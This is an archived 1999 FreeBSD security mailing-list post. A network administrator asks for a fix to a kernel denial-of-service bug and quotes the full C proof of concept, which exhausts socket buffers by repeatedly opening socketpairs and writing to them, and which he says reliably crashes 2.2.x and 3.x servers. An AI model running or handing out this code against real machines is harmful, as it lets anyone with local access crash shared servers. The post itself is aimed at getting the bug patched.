From owner-freebsd-security Mon Aug 16 17:27:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1])
    by hub.freebsd.org (Postfix) with ESMTP id C4E2A14BF8
    for ; Mon, 16 Aug 1999 17:27:17 -0700 (PDT)
    (envelope-from mike@sentex.net)
Received: from gravel (ospf-mdt.sentex.net [205.211.164.81])
    by granite.sentex.net (8.8.8/8.6.9) with SMTP id UAA13737
    for ; Mon, 16 Aug 1999 20:27:29 -0400 (EDT)
Message-Id: <4.1.19990816203409.05989960@granite.sentex.ca>
X-Sender: mdtancsa@granite.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Mon, 16 Aug 1999 20:40:29 -0400
To: freebsd-security@freebsd.org
From: Mike Tancsa
Subject: Any work around for this FreeBSD bug/DoS ?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Is there any work around or coming fix for the 'testsockbuf.c' originally
reported by Marc Olzheim on Aug 9th? It's only a matter of time until some
wannabe script kiddie uploads it to one of my servers for his/her
cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I sent a message
to the security officer last week but haven't heard anything since then.

    ---Mike

#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
    int p[2], i;
    char crap[BUFFERSIZE];

    /* Loop until socketpair() fails; the descriptors are never closed. */
    while (1) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
            break;
        /* Request BUFFERSIZE-byte send and receive buffers on both ends. */
        i = BUFFERSIZE;
        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        /* Non-blocking writes in each direction; nothing ever reads the data. */
        fcntl(p[0], F_SETFL, O_NONBLOCK);
        fcntl(p[1], F_SETFL, O_NONBLOCK);
        write(p[0], crap, BUFFERSIZE);
        write(p[1], crap, BUFFERSIZE);
    }
    return(0);
}

    ---Mike
**********************************************************************
Mike Tancsa, Network Admin        *  mike@sentex.net
Sentex Communications Corp,       *  http://www.sentex.net/mike
Cambridge, Ontario                *  01.519.651.3400
Canada                            *